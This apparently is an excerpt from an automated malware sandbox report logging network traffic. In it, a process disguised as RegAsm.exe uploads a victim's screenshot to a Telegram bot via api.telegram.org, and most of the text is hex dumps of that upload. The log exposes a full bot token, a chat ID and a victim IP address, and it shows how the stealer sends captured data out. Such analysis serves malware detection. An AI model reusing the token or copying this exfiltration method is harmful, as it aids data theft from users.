00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48
                                                                            Data Ascii: --===============8dd3218644a77aaContent-Disposition: form-data; name="document"; filename="C:\Users\user\Documents\NOVA\Captured.png"Content-Type: application/x-ms-dos-executablePNGIHDRCsRGBgAMAapH
                                                                            2025-01-09 10:38:37 UTC16355OUTData Raw: a1 27 79 27 69 07 3e 2f 51 47 cb 58 7b 48 e6 69 ad 62 92 7a be 17 63 bd 04 84 35 8a 4b f2 a9 d2 8f b5 ec cf bc e6 88 d1 4a e0 81 2a f3 24 e7 d4 12 a3 45 00 e6 aa bd 66 ec 79 c4 91 87 c8 3f 5a e5 31 07 f4 89 21 06 4b 01 28 d9 27 a9 e7 b2 4f f3 82 18 79 e4 33 9e a8 00 fc fc 95 81 dc 1b 85 6b 1f aa 4e b9 ee 91 ea 94 1b 1f 4b 3c 5e 9d 75 fb cf aa ab 1e f8 79 75 c7 4f 7f 5e 5d bd e6 91 a1 95 7e fd c8 f7 15 49 bb 49 62 9f 7f 36 d4 c2 af 10 80 54 ff 3d fe e5 ba ff f4 79 d5 b3 37 ee 3f a3 0a f0 b9 3b ea 2a c0 17 7e f4 fe ea 05 04 e0 4f 10 80 cd 31 e0 56 00 7e ba fa ed 03 07 86 22 6f b6 44 12 6f be 91 78 8b a4 dc 28 e8 05 1e c0 51 de 28 67 14 b4 47 24 f2 66 cb 7c 09 c0 53 4f 3d b5 7a f9 b7 bf b5 4a bf 5a 00 4e 8f e3 a3 bf e3 56 ff 65 01 d8 c8 bf 56 00 1e 7d f4 82
                                                                            Data Ascii: 'y'i>/QGX{Hibzc5KJ*$Efy?Z1!K('Oy3kNK<^uyuO^]~IIb6T=y7?;*~O1V~"oDox(Q(gG$f|SO=zJZNVeV}
                                                                            2025-01-09 10:38:37 UTC16355OUTData Raw: 78 25 0a c0 48 f2 0d 23 92 7e 4e 29 f4 4a d6 a6 00 8c 04 df 30 16 04 e0 3d 3d 22 af 5f 7c 18 91 fc 83 48 f4 f5 63 41 00 a6 39 93 7a d0 2f ee 55 80 03 41 e2 35 02 b0 94 80 12 80 5e 01 e8 f2 cf 05 a0 84 5e 84 e6 25 f3 3c 5f fb 97 b9 82 2a 40 d6 b8 f4 73 96 bd f5 b6 16 97 80 92 76 e3 20 a9 07 f4 15 73 ca 5c 97 7d 3a 0a 4c 1f c9 27 e1 a7 79 c5 24 09 c9 95 00 d4 33 04 fd 99 82 c0 b1 5f 97 7e 0e 02 90 4a be 52 f4 d1 d7 18 31 a8 6a 40 e1 63 97 7d 25 92 7c 7a 63 30 f2 af 14 80 3a f2 eb 95 7d 8c 25 fb 68 91 7f 5e 15 28 f2 78 d7 b4 be 11 80 aa ea f3 e3 be 88 3f c6 12 82 ca d7 11 60 64 1c 22 6e f9 6e 37 66 74 b4 57 62 0f e1 27 99 47 1f 5c e2 b5 22 af 41 73 9a 57 f5 9f 62 e5 3a de 06 8c d4 e3 b8 af c4 9f 44 9f f7 25 fd 24 0c 25 0d 91 79 12 80 aa 00 44 f6 d1 42 3e e6
                                                                            Data Ascii: x%H#~N)J0=="_|HcA9z/UA5^^%<_*@sv s\}:L'y$3_~JR1j@c}%|zc0:}%h^(x?`d"nn7ftWb'G\"AsWb:D%$%yDB>
                                                                            2025-01-09 10:38:37 UTC16355OUTData Raw: 98 05 df cd 3d 2c 7e db 2d 19 fa d1 11 62 c9 c2 fc 8c 40 84 1d f2 ae 91 83 5e 29 48 5c b1 7e 48 fc 49 20 4a 10 22 0c 55 35 58 a2 79 1d 25 56 8c b6 dd 67 1f 24 5f ef 0b 43 bc 7a 50 e3 c5 6f 4a 6b 8c a9 3d d2 75 77 bb ae 5a b4 e7 8d d5 b2 7d d2 f7 93 62 f4 89 77 77 bf 3e cf d1 12 63 ce 2b 00 4b 24 fe 5c 02 92 af 35 08 40 55 f5 e5 6a 3e a3 8d b7 15 7e 88 bd ab ab a5 bb 5d 53 2d db 1d c1 87 b8 63 ee aa 1c a3 df dd f1 f2 6a 6a a7 2b f2 78 79 ba 5f 44 df 8a 74 9f 2b d3 7d d2 b2 8f 8e 02 d3 97 0c 24 77 5a 08 5e 9d 8f 06 d3 ba 5c ec c7 14 e2 0d 71 b7 1b 82 30 ad df f1 aa aa bb fd 15 19 fa cc c1 62 44 5d 82 18 68 cc fa ce 76 97 67 e8 03 6b 69 99 67 ad f2 e9 97 d7 d0 fe 2e 02 25 0a 15 cb 42 b0 11 73 a5 b4 a3 a2 8f 96 39 84 9f aa 02 89 d1 92 ef 52 4f 28 be 84 17 66
                                                                            Data Ascii: =,~-b@^)H\~HI J"U5Xy%Vg$_CzPoJk=uwZ}bww>c+K$\5@Uj>~]S-cjj+xy_Dt+}$wZ^\q0bD]hvgkig.%Bs9RO(f
                                                                            2025-01-09 10:38:37 UTC16355OUTData Raw: 5e 22 22 59 75 20 c7 85 93 f7 06 2e 5d 50 7e 4f 03 cb 17 96 fc 4c e2 05 32 49 28 59 fe 46 85 df f2 b9 3d d9 dc 56 d8 15 80 8b 71 58 0b c0 0d 90 89 be 59 ac 91 77 db 20 00 33 69 b7 9d ec 0a c0 f9 2c 22 00 21 95 80 73 c8 44 de 56 58 54 00 ae bc b9 fc 5c 49 5c 32 e9 17 99 27 fb 0e e7 77 00 4a 26 fb 32 90 79 9b 21 13 80 92 09 bf 96 28 f4 66 11 c5 5e 1b 6f c7 91 45 05 20 1c 69 02 30 ca bf 28 00 ad f8 8b f2 0f 10 80 92 09 bf 96 ad 0a c0 38 1f 69 c5 9f 6c b7 00 cc 2a 01 21 ca 3f d8 ac 00 04 8f fd d2 b7 1a 90 3e 02 d0 38 64 02 50 99 d7 56 f7 71 1c 18 1c 93 67 2c ae 69 05 a0 ef fd 73 8c 00 cc 24 a0 15 82 51 d6 29 f5 94 75 1c 0b b6 ca 8f 77 04 32 66 6e cd f1 dd 81 b8 97 c4 aa bf b8 7f db f7 f8 2f 17 84 78 49 08 e2 cf cb 43 14 76 4a bb 28 f6 94 7a c6 a2 c4 b3 55 00
                                                                            Data Ascii: ^""Yu .]P~OL2I(YF=VqXYw 3i,"!sDVXT\I\2'wJ&2y!(f^oE i0(8il*!?>8dPVqg,is$Q)uw2fn/xICvJ(zU
                                                                            2025-01-09 10:38:37 UTC16355OUTData Raw: 23 ca 3d 85 a0 20 06 5b 62 f5 df 4c c9 37 03 aa 01 ad de 9b 05 02 10 b9 17 2b ff 3c f2 ab f0 53 fe 99 c3 18 c1 e7 7b fe 5a e9 27 7d ce 34 99 00 8c 7d a0 cf 45 21 b4 be 03 30 4a 3c a5 9e 55 7d fd dc 0d 53 12 d0 4a 40 2b fd 5c d3 ae 47 00 46 09 d8 0a c0 a3 ca 67 f3 5d 80 08 40 df fd 67 45 20 e2 ae 3d fa ab f4 63 4e f9 27 cc c7 1b 7f c9 a5 8d 02 90 be 63 c5 5f 94 76 ed 98 16 59 67 6c 94 77 61 ae 15 7d ae e5 36 e0 a5 67 5e 33 25 0d 9d ab eb 87 4a bf 58 05 28 88 40 2a fd bc e1 97 16 01 48 8b e8 8b 47 7f 7b e9 17 fb bd cc a3 6d 05 20 37 fd d6 0b 40 9e d1 cf 1b 43 fa 59 01 48 0c 01 38 39 e6 e3 55 e0 29 f9 7c ff 1f 12 af 8a b7 41 0e 66 72 0f da 77 08 d2 af 47 76 4b 1c 90 76 1e d5 45 fa 29 03 39 16 1c 45 1e 31 40 f4 29 fb c8 f7 79 0a c2 28 0d 11 84 c6 5a f1 a6 98
                                                                            Data Ascii: #= [bL7+<S{Z'}4}E!0J<U}SJ@+\GFg]@gE =cN'c_vYglwa}6g^3%JX(@*HG{m 7@CYH89U)|AfrwGvKvE)9E1@)y(Z
                                                                            2025-01-09 10:38:37 UTC16355OUTData Raw: fd 90 7c ca 3f a9 e2 6f 90 81 1c ff ed 05 60 26 f8 d6 63 9b 04 60 5b fd 47 b5 1f c7 81 11 7e d9 2f 24 20 f3 1c 11 a6 1f d7 6e e4 d2 90 c3 52 00 de 80 00 3c 7b a8 fe 43 fe 4d 57 ff 75 df 7f 6f 2f 00 ef be bb 5e 00 f2 c0 0b 4e e9 1e 7c ca ff d6 dd 7f ee 7b bb 7b 6f bb 6d a6 00 bc ec d3 7f dd 5d fe c5 8f 75 1f fe f6 8d 8f 1b 01 78 d6 d9 67 77 07 1f 7e 78 94 57 b4 c8 27 fa b7 de 75 7f f7 0f 87 77 d2 cd e3 d8 0b bf 5b d7 51 d1 16 e3 7f 12 2e b2 60 6c ff be fb ee ef 1e 3a 78 b0 7b d3 5b de 72 44 09 c0 f6 bb f2 e7 ec 2b 00 57 e5 1f d5 81 51 86 ce 15 80 7e 27 03 6b 04 60 fc ae 12 59 b7 13 ac 11 80 b2 46 00 ce a0 0a c0 f2 cf a2 58 11 58 40 ee 55 c1 77 31 ef 05 e4 fd 80 0f 77 7b 2f ed 46 f6 5d fe e8 50 19 d8 5f 32 c2 bb 03 eb 91 61 64 a0 22 b0 40 25 60 ad 08 7c df
                                                                            Data Ascii: |?o`&c`[G~/$ nR<{CMWuo/^N|{{om]uxgw~xW'uw[Q.`l:x{[rD+WQ~'k`YFXX@Uw1w{/F]P_2ad"@%`|
                                                                            2025-01-09 10:38:37 UTC16355OUTData Raw: 88 43 8e 00 23 e8 54 f1 37 23 fc 6c 6d 91 81 cd 5c 23 f5 24 f6 bc f8 03 3f ef 41 16 72 c4 58 fb d1 e6 a3 bf b6 ef 9a 7d 6e 4a ab f7 b4 9f e1 ae f6 9e 76 9e 2d ff bc 00 ac c5 1c c2 0e f1 c7 85 20 db d8 1e b9 4a 6f 80 e4 f3 f3 40 5f 63 f6 a2 af 1c 9f a7 5c 5f cd 07 be ca 4f 73 12 7f 1e 49 40 5d f6 21 e1 a7 ea 3f 2e 07 21 46 a5 9e 44 1f ad 9e e5 27 b1 e7 25 a0 60 2c 18 7b 31 e8 05 21 7d 5d f4 e1 a5 9f aa fc 40 73 aa f8 93 00 cc f2 cf be 97 5c 85 47 ac 48 3a a1 aa 3d fa cc 73 74 57 a2 50 22 10 94 43 3f 12 83 9d bf b8 a2 ad 32 f4 fb e5 b9 d7 fd 7d 2b ed 24 e4 24 ed 90 7c 5e fe d5 72 90 3e 22 4f 63 f2 54 ed e7 f7 93 08 d4 1e 12 80 40 9f 39 ed c5 c5 21 9d d7 5d d1 e6 30 f6 b9 ba 58 c4 c7 e6 f5 0c c0 cb bf 7e 79 16 80 f0 dc 73 cf a5 ef df 72 4f 3a ee ec bf cb 17
                                                                            Data Ascii: C#T7#lm\#$?ArX}nJv- Jo@_c\_OsI@]!?.!FD'%`,{1!}]@s\GH:=stWP"C?2}+$$|^r>"OcT@9!]0X~ysrO:
                                                                            2025-01-09 10:38:37 UTC16355OUTData Raw: 44 91 80 54 02 22 f5 10 7c 92 7c c4 84 a4 1f cf 0d 24 bf ac c9 a2 6e d7 e3 66 60 2c de 7e 5e ea 92 53 9e f9 97 fb c4 ca 9a 1e e1 a7 5c da 1a cb f7 d2 2b 4b 30 84 18 02 0d 29 46 9f 18 48 a0 d5 b2 ac 46 b9 c3 08 40 72 b4 9f d6 f1 da 5e 40 12 a7 2f a2 98 c6 ac e3 d9 83 d1 be c4 fa c5 59 a3 d7 2c 73 ad 00 44 06 d6 b2 0f 98 e3 62 0f 04 1c 20 f0 10 6f 3e e7 dd 5f 74 42 ce 88 e4 1f 30 37 5f 01 68 6b a8 02 d4 6b d0 cf 20 f9 90 80 c8 3f eb 67 f1 17 09 40 20 0f 81 27 24 e2 f6 b6 fe 51 f6 19 11 77 3c db 8f 96 71 8d c4 9f 28 7b 64 18 53 fd a7 e7 03 d2 27 a6 f9 8a 65 01 58 08 a4 de 28 44 d2 cf 13 4b 3f 8f 7d 87 83 08 a5 dd 0c 2f 67 01 38 b1 fe 97 69 f2 dc 5f b7 78 19 d8 23 02 c5 f9 f6 ff 15 a5 42 b0 ad 14 ac aa 02 3b 3c 3b b0 88 c0 88 a9 4d 36 b7 f1 b9 e6 06 e2 0b 9e
                                                                            Data Ascii: DT"||$nf`,~^S\+K0)FHF@r^@/Y,sDb o>_tB07_hkk ?g@ '$Qw<q({dS'eX(DK?}/g8i_x#B;<;M6
                                                                            2025-01-09 10:38:37 UTC16355OUTData Raw: c1 73 69 c5 79 cf a4 a9 73 7e 9d 26 6d 1d ef 71 f2 0c fb fd 2d cf 02 8c 88 84 5f 8d 17 7d be f5 f1 90 93 1f 8f e3 15 91 f4 eb 9c ec c6 91 d4 1b 85 4a e8 8d ca 52 0b 40 9f 0f 91 f4 f3 cc 48 3d 09 bf 1a 9f 33 c3 b2 00 6c c6 2f 77 01 38 4b e8 05 48 fe 79 01 d8 ae 2f 02 70 ea 2f 7f 9a a1 2f f9 d7 e1 e8 ed 22 0b 40 e6 fd 31 60 e5 ce 30 73 13 30 c7 80 fd c5 1f c3 08 40 44 5e 8d c4 a0 97 81 c4 e6 12 80 3a 02 ac 7e 67 81 cf 00 d4 25 20 54 fe 79 24 02 a1 bb f6 96 a6 d2 ef 70 1b 5b cb b8 f3 d6 9b db f8 6a 7b 6f 5e 02 d6 20 f8 a8 f4 5b 65 fb 82 af fa e3 38 30 f2 8f be 17 80 33 cf ff bb 2d 75 0e ba 21 4b 3d 24 1f af 33 7d 38 7b 35 af 27 31 a8 be 2a ff 5a 69 f8 d6 1f 36 97 79 1c 72 73 7b 09 08 62 8f 18 15 7e 12 82 5e f8 81 f2 57 73 4b 32 b7 04 bb a3 be 3a da 4b df 0b
                                                                            Data Ascii: siys~&mq-_}JR@H=3l/w8KHy/p//"@1`0s0@D^:~g% Ty$p[j{o^ [e803-u!K=$3}8{5'1*Zi6yrs{b~^WsK2:K
                                                                            2025-01-09 10:38:38 UTC389INHTTP/1.1 200 OK
                                                                            Server: nginx/1.18.0
                                                                            Date: Thu, 09 Jan 2025 10:38:38 GMT
                                                                            Content-Type: application/json
                                                                            Content-Length: 1828
                                                                            Connection: close
                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                            Access-Control-Allow-Origin: *
                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            16192.168.2.449768149.154.167.2204437588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-01-09 10:38:40 UTC2113OUTPOST /bot6423275328:AAEFALkc3yNmgwbyoG03lPKwIaT4LiLSn38/sendDocument?chat_id=5088754730&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D [TRUNCATED]
                                                                            Content-Type: multipart/form-data; boundary================8dd3237e999b955
                                                                            Host: api.telegram.org
                                                                            Content-Length: 695477
                                                                            Connection: Keep-Alive
                                                                            2025-01-09 10:38:40 UTC16355OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 33 37 65 39 39 39 62 39 35 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 6a 6f 6e 65 73 5c 44 6f 63 75 6d 65 6e 74 73 5c 4e 4f 56 41 5c 43 61 70 74 75 72 65 64 2e 70 6e 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 04 00 08 06 00 00 00 be 93 f4 43 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48
                                                                            Data Ascii: --===============8dd3237e999b955Content-Disposition: form-data; name="document"; filename="C:\Users\user\Documents\NOVA\Captured.png"Content-Type: application/x-ms-dos-executablePNGIHDRCsRGBgAMAapH
                                                                            2025-01-09 10:38:40 UTC16355OUTData Raw: a1 27 79 27 69 07 3e 2f 51 47 cb 58 7b 48 e6 69 ad 62 92 7a be 17 63 bd 04 84 35 8a 4b f2 a9 d2 8f b5 ec cf bc e6 88 d1 4a e0 81 2a f3 24 e7 d4 12 a3 45 00 e6 aa bd 66 ec 79 c4 91 87 c8 3f 5a e5 31 07 f4 89 21 06 4b 01 28 d9 27 a9 e7 b2 4f f3 82 18 79 e4 33 9e a8 00 fc fc 95 81 dc 1b 85 6b 1f aa 4e b9 ee 91 ea 94 1b 1f 4b 3c 5e 9d 75 fb cf aa ab 1e f8 79 75 c7 4f 7f 5e 5d bd e6 91 a1 95 7e fd c8 f7 15 49 bb 49 62 9f 7f 36 d4 c2 af 10 80 54 ff 3d fe e5 ba ff f4 79 d5 b3 37 ee 3f a3 0a f0 b9 3b ea 2a c0 17 7e f4 fe ea 05 04 e0 4f 10 80 cd 31 e0 56 00 7e ba fa ed 03 07 86 22 6f b6 44 12 6f be 91 78 8b a4 dc 28 e8 05 1e c0 51 de 28 67 14 b4 47 24 f2 66 cb 7c 09 c0 53 4f 3d b5 7a f9 b7 bf b5 4a bf 5a 00 4e 8f e3 a3 bf e3 56 ff 65 01 d8 c8 bf 56 00 1e 7d f4 82
                                                                            Data Ascii: 'y'i>/QGX{Hibzc5KJ*$Efy?Z1!K('Oy3kNK<^uyuO^]~IIb6T=y7?;*~O1V~"oDox(Q(gG$f|SO=zJZNVeV}
                                                                            2025-01-09 10:38:40 UTC16355OUTData Raw: 78 25 0a c0 48 f2 0d 23 92 7e 4e 29 f4 4a d6 a6 00 8c 04 df 30 16 04 e0 3d 3d 22 af 5f 7c 18 91 fc 83 48 f4 f5 63 41 00 a6 39 93 7a d0 2f ee 55 80 03 41 e2 35 02 b0 94 80 12 80 5e 01 e8 f2 cf 05 a0 84 5e 84 e6 25 f3 3c 5f fb 97 b9 82 2a 40 d6 b8 f4 73 96 bd f5 b6 16 97 80 92 76 e3 20 a9 07 f4 15 73 ca 5c 97 7d 3a 0a 4c 1f c9 27 e1 a7 79 c5 24 09 c9 95 00 d4 33 04 fd 99 82 c0 b1 5f 97 7e 0e 02 90 4a be 52 f4 d1 d7 18 31 a8 6a 40 e1 63 97 7d 25 92 7c 7a 63 30 f2 af 14 80 3a f2 eb 95 7d 8c 25 fb 68 91 7f 5e 15 28 f2 78 d7 b4 be 11 80 aa ea f3 e3 be 88 3f c6 12 82 ca d7 11 60 64 1c 22 6e f9 6e 37 66 74 b4 57 62 0f e1 27 99 47 1f 5c e2 b5 22 af 41 73 9a 57 f5 9f 62 e5 3a de 06 8c d4 e3 b8 af c4 9f 44 9f f7 25 fd 24 0c 25 0d 91 79 12 80 aa 00 44 f6 d1 42 3e e6
                                                                            Data Ascii: x%H#~N)J0=="_|HcA9z/UA5^^%<_*@sv s\}:L'y$3_~JR1j@c}%|zc0:}%h^(x?`d"nn7ftWb'G\"AsWb:D%$%yDB>
                                                                            2025-01-09 10:38:40 UTC16355OUTData Raw: 98 05 df cd 3d 2c 7e db 2d 19 fa d1 11 62 c9 c2 fc 8c 40 84 1d f2 ae 91 83 5e 29 48 5c b1 7e 48 fc 49 20 4a 10 22 0c 55 35 58 a2 79 1d 25 56 8c b6 dd 67 1f 24 5f ef 0b 43 bc 7a 50 e3 c5 6f 4a 6b 8c a9 3d d2 75 77 bb ae 5a b4 e7 8d d5 b2 7d d2 f7 93 62 f4 89 77 77 bf 3e cf d1 12 63 ce 2b 00 4b 24 fe 5c 02 92 af 35 08 40 55 f5 e5 6a 3e a3 8d b7 15 7e 88 bd ab ab a5 bb 5d 53 2d db 1d c1 87 b8 63 ee aa 1c a3 df dd f1 f2 6a 6a a7 2b f2 78 79 ba 5f 44 df 8a 74 9f 2b d3 7d d2 b2 8f 8e 02 d3 97 0c 24 77 5a 08 5e 9d 8f 06 d3 ba 5c ec c7 14 e2 0d 71 b7 1b 82 30 ad df f1 aa aa bb fd 15 19 fa cc c1 62 44 5d 82 18 68 cc fa ce 76 97 67 e8 03 6b 69 99 67 ad f2 e9 97 d7 d0 fe 2e 02 25 0a 15 cb 42 b0 11 73 a5 b4 a3 a2 8f 96 39 84 9f aa 02 89 d1 92 ef 52 4f 28 be 84 17 66
                                                                            Data Ascii: =,~-b@^)H\~HI J"U5Xy%Vg$_CzPoJk=uwZ}bww>c+K$\5@Uj>~]S-cjj+xy_Dt+}$wZ^\q0bD]hvgkig.%Bs9RO(f
                                                                            2025-01-09 10:38:40 UTC16355OUTData Raw: 5e 22 22 59 75 20 c7 85 93 f7 06 2e 5d 50 7e 4f 03 cb 17 96 fc 4c e2 05 32 49 28 59 fe 46 85 df f2 b9 3d d9 dc 56 d8 15 80 8b 71 58 0b c0 0d 90 89 be 59 ac 91 77 db 20 00 33 69 b7 9d ec 0a c0 f9 2c 22 00 21 95 80 73 c8 44 de 56 58 54 00 ae bc b9 fc 5c 49 5c 32 e9 17 99 27 fb 0e e7 77 00 4a 26 fb 32 90 79 9b 21 13 80 92 09 bf 96 28 f4 66 11 c5 5e 1b 6f c7 91 45 05 20 1c 69 02 30 ca bf 28 00 ad f8 8b f2 0f 10 80 92 09 bf 96 ad 0a c0 38 1f 69 c5 9f 6c b7 00 cc 2a 01 21 ca 3f d8 ac 00 04 8f fd d2 b7 1a 90 3e 02 d0 38 64 02 50 99 d7 56 f7 71 1c 18 1c 93 67 2c ae 69 05 a0 ef fd 73 8c 00 cc 24 a0 15 82 51 d6 29 f5 94 75 1c 0b b6 ca 8f 77 04 32 66 6e cd f1 dd 81 b8 97 c4 aa bf b8 7f db f7 f8 2f 17 84 78 49 08 e2 cf cb 43 14 76 4a bb 28 f6 94 7a c6 a2 c4 b3 55 00
                                                                            Data Ascii: ^""Yu .]P~OL2I(YF=VqXYw 3i,"!sDVXT\I\2'wJ&2y!(f^oE i0(8il*!?>8dPVqg,is$Q)uw2fn/xICvJ(zU
                                                                            2025-01-09 10:38:40 UTC16355OUTData Raw: 23 ca 3d 85 a0 20 06 5b 62 f5 df 4c c9 37 03 aa 01 ad de 9b 05 02 10 b9 17 2b ff 3c f2 ab f0 53 fe 99 c3 18 c1 e7 7b fe 5a e9 27 7d ce 34 99 00 8c 7d a0 cf 45 21 b4 be 03 30 4a 3c a5 9e 55 7d fd dc 0d 53 12 d0 4a 40 2b fd 5c d3 ae 47 00 46 09 d8 0a c0 a3 ca 67 f3 5d 80 08 40 df fd 67 45 20 e2 ae 3d fa ab f4 63 4e f9 27 cc c7 1b 7f c9 a5 8d 02 90 be 63 c5 5f 94 76 ed 98 16 59 67 6c 94 77 61 ae 15 7d ae e5 36 e0 a5 67 5e 33 25 0d 9d ab eb 87 4a bf 58 05 28 88 40 2a fd bc e1 97 16 01 48 8b e8 8b 47 7f 7b e9 17 fb bd cc a3 6d 05 20 37 fd d6 0b 40 9e d1 cf 1b 43 fa 59 01 48 0c 01 38 39 e6 e3 55 e0 29 f9 7c ff 1f 12 af 8a b7 41 0e 66 72 0f da 77 08 d2 af 47 76 4b 1c 90 76 1e d5 45 fa 29 03 39 16 1c 45 1e 31 40 f4 29 fb c8 f7 79 0a c2 28 0d 11 84 c6 5a f1 a6 98
                                                                            Data Ascii: #= [bL7+<S{Z'}4}E!0J<U}SJ@+\GFg]@gE =cN'c_vYglwa}6g^3%JX(@*HG{m 7@CYH89U)|AfrwGvKvE)9E1@)y(Z
                                                                            2025-01-09 10:38:40 UTC16355OUTData Raw: fd 90 7c ca 3f a9 e2 6f 90 81 1c ff ed 05 60 26 f8 d6 63 9b 04 60 5b fd 47 b5 1f c7 81 11 7e d9 2f 24 20 f3 1c 11 a6 1f d7 6e e4 d2 90 c3 52 00 de 80 00 3c 7b a8 fe 43 fe 4d 57 ff 75 df 7f 6f 2f 00 ef be bb 5e 00 f2 c0 0b 4e e9 1e 7c ca ff d6 dd 7f ee 7b bb 7b 6f bb 6d a6 00 bc ec d3 7f dd 5d fe c5 8f 75 1f fe f6 8d 8f 1b 01 78 d6 d9 67 77 07 1f 7e 78 94 57 b4 c8 27 fa b7 de 75 7f f7 0f 87 77 d2 cd e3 d8 0b bf 5b d7 51 d1 16 e3 7f 12 2e b2 60 6c ff be fb ee ef 1e 3a 78 b0 7b d3 5b de 72 44 09 c0 f6 bb f2 e7 ec 2b 00 57 e5 1f d5 81 51 86 ce 15 80 7e 27 03 6b 04 60 fc ae 12 59 b7 13 ac 11 80 b2 46 00 ce a0 0a c0 f2 cf a2 58 11 58 40 ee 55 c1 77 31 ef 05 e4 fd 80 0f 77 7b 2f ed 46 f6 5d fe e8 50 19 d8 5f 32 c2 bb 03 eb 91 61 64 a0 22 b0 40 25 60 ad 08 7c df
                                                                            Data Ascii: |?o`&c`[G~/$ nR<{CMWuo/^N|{{om]uxgw~xW'uw[Q.`l:x{[rD+WQ~'k`YFXX@Uw1w{/F]P_2ad"@%`|
                                                                            2025-01-09 10:38:40 UTC16355OUTData Raw: 88 43 8e 00 23 e8 54 f1 37 23 fc 6c 6d 91 81 cd 5c 23 f5 24 f6 bc f8 03 3f ef 41 16 72 c4 58 fb d1 e6 a3 bf b6 ef 9a 7d 6e 4a ab f7 b4 9f e1 ae f6 9e 76 9e 2d ff bc 00 ac c5 1c c2 0e f1 c7 85 20 db d8 1e b9 4a 6f 80 e4 f3 f3 40 5f 63 f6 a2 af 1c 9f a7 5c 5f cd 07 be ca 4f 73 12 7f 1e 49 40 5d f6 21 e1 a7 ea 3f 2e 07 21 46 a5 9e 44 1f ad 9e e5 27 b1 e7 25 a0 60 2c 18 7b 31 e8 05 21 7d 5d f4 e1 a5 9f aa fc 40 73 aa f8 93 00 cc f2 cf be 97 5c 85 47 ac 48 3a a1 aa 3d fa cc 73 74 57 a2 50 22 10 94 43 3f 12 83 9d bf b8 a2 ad 32 f4 fb e5 b9 d7 fd 7d 2b ed 24 e4 24 ed 90 7c 5e fe d5 72 90 3e 22 4f 63 f2 54 ed e7 f7 93 08 d4 1e 12 80 40 9f 39 ed c5 c5 21 9d d7 5d d1 e6 30 f6 b9 ba 58 c4 c7 e6 f5 0c c0 cb bf 7e 79 16 80 f0 dc 73 cf a5 ef df 72 4f 3a ee ec bf cb 17
                                                                            Data Ascii: C#T7#lm\#$?ArX}nJv- Jo@_c\_OsI@]!?.!FD'%`,{1!}]@s\GH:=stWP"C?2}+$$|^r>"OcT@9!]0X~ysrO:
                                                                            2025-01-09 10:38:40 UTC16355OUTData Raw: 44 91 80 54 02 22 f5 10 7c 92 7c c4 84 a4 1f cf 0d 24 bf ac c9 a2 6e d7 e3 66 60 2c de 7e 5e ea 92 53 9e f9 97 fb c4 ca 9a 1e e1 a7 5c da 1a cb f7 d2 2b 4b 30 84 18 02 0d 29 46 9f 18 48 a0 d5 b2 ac 46 b9 c3 08 40 72 b4 9f d6 f1 da 5e 40 12 a7 2f a2 98 c6 ac e3 d9 83 d1 be c4 fa c5 59 a3 d7 2c 73 ad 00 44 06 d6 b2 0f 98 e3 62 0f 04 1c 20 f0 10 6f 3e e7 dd 5f 74 42 ce 88 e4 1f 30 37 5f 01 68 6b a8 02 d4 6b d0 cf 20 f9 90 80 c8 3f eb 67 f1 17 09 40 20 0f 81 27 24 e2 f6 b6 fe 51 f6 19 11 77 3c db 8f 96 71 8d c4 9f 28 7b 64 18 53 fd a7 e7 03 d2 27 a6 f9 8a 65 01 58 08 a4 de 28 44 d2 cf 13 4b 3f 8f 7d 87 83 08 a5 dd 0c 2f 67 01 38 b1 fe 97 69 f2 dc 5f b7 78 19 d8 23 02 c5 f9 f6 ff 15 a5 42 b0 ad 14 ac aa 02 3b 3c 3b b0 88 c0 88 a9 4d 36 b7 f1 b9 e6 06 e2 0b 9e
                                                                            Data Ascii: DT"||$nf`,~^S\+K0)FHF@r^@/Y,sDb o>_tB07_hkk ?g@ '$Qw<q({dS'eX(DK?}/g8i_x#B;<;M6
